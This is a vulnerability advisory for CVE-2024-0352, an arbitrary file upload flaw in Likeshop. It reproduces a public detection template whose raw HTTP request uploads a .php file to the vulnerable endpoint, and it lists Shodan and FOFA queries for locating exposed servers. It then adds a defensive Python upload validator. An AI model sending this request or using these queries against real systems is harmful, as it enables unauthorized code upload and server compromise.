CVE-2024-0352: Likeshop < 2.5.7.20210311 - Arbitrary File Upload

Date: 2025-08-01 | Affected software: Likeshop | PoC: public

Vulnerability description

A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. It affects the function FileServer::userFormImage in the file server/application/api/controller/File.php, part of the HTTP POST Request Handler component. Manipulating the argument file with an unknown input leads to an unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434.

PoC code [public]

id: CVE-2024-0352

info:
  name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
  author: CookieHanHoan,babybash,samuelsamuelsamuel
  severity: critical
  description: |
    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
  impact: |
    The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0352
    - https://note.zhaoj.in/share/ciwYj7QXC4sZ
    - https://vuldb.com/?ctiid.250120
    - https://vuldb.com/?id.250120
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0352
    cwe-id: CWE-434
    epss-score: 0.91804
    epss-percentile: 0.99676
    cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: likeshop
    product: likeshop
    shodan-query: http.favicon.hash:874152924
    fofa-query: icon_hash=874152924
  tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive,vkev
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/file/formimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="file";filename="{{filename}}.php"
        Content-Type: application/x-php

        {{randstr}}
        ------WebKitFormBoundarygcflwtei--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"name\":\"{{filename}}.php\"")'
          - 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
        condition: and

    extractors:
      - type: json
        part: body
        json:
          - ".data.url"
# digest: 4a0a004730450220171ce2c46c65e885702fb66f5d42074db9413dc299caf6790d391ffa5b8740ad022100e68ccb237b3afcb3c46629a7ae609050cd229d74be4d3e9a3607f282f19b232d:922c64590222798bb761d5b6d8e72950
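
A server-side check that would refuse the upload request shown in the template above, added here as an example (it is not Likeshop's code or its patch). The allowlist, the function names and the sample bodies are assumptions made for illustration.

```python
import os
from email.parser import BytesParser
from email.policy import default

# Assumed allowlist (not from Likeshop): extension -> accepted magic bytes.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
BOUNDARY = "----WebKitFormBoundarygcflwtei"  # boundary string used in the template
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY

def sample_body(filename: str, part_type: str, content: bytes) -> bytes:
    """Constructed request body with the same shape as the template's upload."""
    head = (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="file";filename="{filename}"\r\n'
            f"Content-Type: {part_type}\r\n\r\n").encode()
    return head + content + f"\r\n--{BOUNDARY}--\r\n".encode()

def parse_upload(content_type: str, body: bytes, field: str = "file"):
    """Return (filename, payload) of the named multipart field, or None."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = BytesParser(policy=default).parsebytes(raw)
    if not msg.is_multipart():
        return None
    for part in msg.iter_parts():
        if part.get_param("name", header="content-disposition") == field:
            return part.get_filename() or "", part.get_payload(decode=True) or b""
    return None

def check_upload(filename: str, payload: bytes):
    """Decide from the name and the bytes; the client's Content-Type is ignored."""
    name = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed"
    if not payload.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    return True, "ok"

def handle(content_type: str, body: bytes):
    """Validate the 'file' field of a multipart body; returns (ok, reason)."""
    upload = parse_upload(content_type, body)
    if upload is None:
        return False, "no file field"
    return check_upload(*upload)
```

An accepted file should still be stored under a server-generated name in a directory the web server does not execute scripts from, since the extension and magic-byte checks only narrow what can be written.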
